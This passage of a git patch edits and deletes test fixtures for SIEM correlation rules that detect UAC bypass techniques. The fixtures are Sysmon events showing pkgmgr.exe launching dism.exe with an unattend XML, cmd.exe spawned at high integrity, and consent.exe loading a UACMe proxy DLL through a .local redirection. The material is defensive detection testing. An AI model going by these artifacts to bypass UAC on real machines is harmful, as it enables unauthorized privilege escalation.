"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\test.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\test.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\test.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\test.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} - -expect not {"correlation_name": "UACME_23_DismCore_Hijacking"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_7.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_7.sc deleted file mode 100644 index 4db762a4..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_7.sc +++ /dev/null @@ -1,4 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\test.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\test.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\test.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\test.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "test.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} - -expect not {"correlation_name": "UACME_23_DismCore_Hijacking"} From 6063aa631d0173fbb671780d9d75de4053692bc8 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 11:42:40 +0300 Subject: [PATCH 53/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=D1=8B,=20=D1=80=D0=B0=D1=81?= =?UTF-8?q?=D1=88=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20?= =?UTF-8?q?=D0=B4=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE?= =?UTF-8?q?=D1=80=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4?= =?UTF-8?q?=D0=B0=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0?= =?UTF-8?q?=D0=B2=D0=B8=D0=BB=D0=B0=20(UAC=5FBypass=5FVia=5FConsent)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../UAC_Bypass_Via_Consent/tests/test_1.sc | 23 +++++++++-- .../UAC_Bypass_Via_Consent/tests/test_2.sc | 41 +++++++++---------- .../UAC_Bypass_Via_Consent/tests/test_3.sc | 6 +++ 3 files changed, 45 insertions(+), 25 deletions(-) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_1.sc index 4b6ef1d6..c5ebf57a 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_1.sc @@ -1,5 +1,20 @@ -{ "_checkpoint": 57615712018, "_meta": { "id": "01da0c7e-03b2-01ee-8c68-005056825a53", "time": "2023-06-05T15:02:22.4660000Z", "assetIds": [ "1864e292-4880-0001-0000-000000000007" ], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true }, "action": "start", "asset_ids": [ "1864e292-4880-0001-0000-000000000007" ], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T15:02:22.480032900Z\"},\"EventRecordID\":\"800891\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3144\",\"ThreadID\":\"984\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-05 15:02:22.466\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-f8dd-647d-8401-000000003900}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2328\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\",\"Name\":\"Image\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\\\comctl32.dll\",\"Name\":\"ImageLoaded\"},{\"text\":\"3.1.8.1904\",\"Name\":\"FileVersion\"},{\"text\":\"UACMe proxy DLL\",\"Name\":\"Description\"},{\"text\":\"UACMe\",\"Name\":\"Product\"},{\"text\":\"Hazardous Environments\",\"Name\":\"Company\"},{\"text\":\"Ikazuchi.dll\",\"Name\":\"OriginalFileName\"},{\"text\":\"MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\",\"Name\":\"Hashes\"},{\"text\":\"false\",\"Name\":\"Signed\"},{\"text\":\"-\",\"Name\":\"Signature\"},{\"text\":\"Unavailable\",\"Name\":\"SignatureStatus\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "datafield10": "Ikazuchi.dll", "datafield2": "2328", "datafield3": "c:\\windows\\system32\\", "datafield4": "consent.exe", "datafield6": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "datafield7": "20fff121-f8dd-647d-8401-000000003900", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "incorrect_time": false, "input_id": "00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.account.provider": "local", "object.name": "comctl32.dll", "object.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "object.process.hash": "IMPHASH:1C6B5C991BBBDC2B578EA7DEEF4AFA1B MD5:9E5AED3F57CEBC5154F9373B2BB9BA05 SHA256:FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", 